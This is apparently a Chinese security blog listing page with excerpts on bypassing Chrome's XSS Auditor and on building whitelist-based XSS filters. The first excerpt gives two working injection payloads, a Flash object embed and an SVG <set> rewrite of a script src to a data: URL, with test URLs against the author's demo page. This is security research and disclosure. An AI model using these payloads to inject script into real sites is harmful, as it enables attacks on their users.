浏览器安全一 / Chrome XSS Auditor bypass

作者: 分类: web前端 时间: 2016-1-16 1:18 评论: 2条评论 浏览: 5427人看过 标签: 浏览器 fliter

私藏比较久的干货,严禁转载。

(2017-01-04 更新)

Bypass 3 via flash

只要支持flash的chrome版本(最新版Chrome 5),均可使用。
context == support flash

<object allowscriptaccess=always> <param name=url value=http://mhz.pw/game/xss/alert.swf> 

test

http://mhz.pw/game/xss/xss.php?xss=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=http://mhz.pw/game/xss/alert.swf%3E


Universal Bypass 2

最新版(Chrome 55/56)无任何条件,只要输出在页面中即可执行代码。
context == null

?xss=<svg><set href=#script attributeName=href to=data:,alert(document.domain) /><script id=script src=foo></script> 

test

http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Cset%20href=%23script%20attributeName=href%20to=data:,alert(document.domain)%20/%3E%3Cscript%20id=script%20src=foo%3E%3C/script%3E

阅读全文>>

Chrome XSS Auditor Bypass Using SVG

作者: 分类: 网络安全 时间: 2015-2-11 21:58 评论: 0条评论 浏览: 5436人看过 标签: 浏览器 fliter audit

    除了之前MK发布的一个bypass方法外(https://twitter.com/avlidienbrunn/status/486059626002395136),大牛们也陆续想出来一些针对性的绕过方法。我说的这个出自:http://www.thespanner.co.uk/2015/02/10/xss-auditor-bypass/

    应用场景出现在,输出点在<script>中的引号中,不能闭合引号(如使用了addslashes转义),但可以用</script>闭合整个script标签。

    我写了一个应用场景:http://mhz.pw/game/audit/xss.php?name=test ,源码如下:

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta charset="utf-8"/>
<tit...


阅读全文>>

一个前端DOMXSS过滤器

作者: 分类: 网络安全 时间: 2014-8-1 3:18 评论: 6条评论 浏览: 5655人看过 标签: fliter DOMXSS

    最近热衷于刷twitter,各种大牛的东西让我应接不暇,感觉确实新有干货,前几天看到Yosuke发状态了:

    01.jpg

    是发的一个DOMParser处理、过滤html的小程序。想想觉得还是挺新颖的,以前自己也做了一个XssHtml过滤类(http://phith0n.github.io/XssHtml/),但都是基于后端语言的,不能处理前端比如DOMXSS。

    看了他的代码感觉挺好的,思路也是基于白名单的过滤机制,将允许存在的标签和属性列在javascript对象中,遍历DOM后将允许的标签和属性保留,不允许的丢弃。

阅读全文>>

XssHtml – 基于白名单的富文本XSS过滤类

作者: 分类: 网络安全 时间: 2014-6-26 23:35 评论: 4条评论 浏览: 3837人看过 标签: xss fliter

    啦啦啦,去了北京参加荣耀6的发布会,真心不错呀这款手机,在这里无耻地推荐一下。与会的同学都获得了一枚荣耀6,说说我的感受吧:CPU真心给力,跑分很高;价格合理,2000是荣耀一贯的高性价比;特权给力,寝室的Chinanet可以免费用了;相机真不错,全景拍照,把整个鸟巢拍得一清二楚,抓拍也很给力,黑屏状态下按两次音量下就能在0.6秒完成一次拍摄;触屏很舒服,滑动没有一丝卡顿。

    好了,去北京之前freebuf上投了一篇文章,发到博客里吧。

    关于富文本XSS,我在之前的一篇文章里(http://www.freebuf.com/articles/web/30201.html)已经比较详细地说明了一些开源应用使用的XSS Filter以及绕过方法。之前我也总结了一些filter的缺点,利用白名单机制完成了一个XSS Filter类,希望能更大程度地避免富文本XSS的产生。

    总结一下现存的一些XSS Filter的缺点,可以归纳成以下几条...

阅读全文>>

Top ↑ sitemap More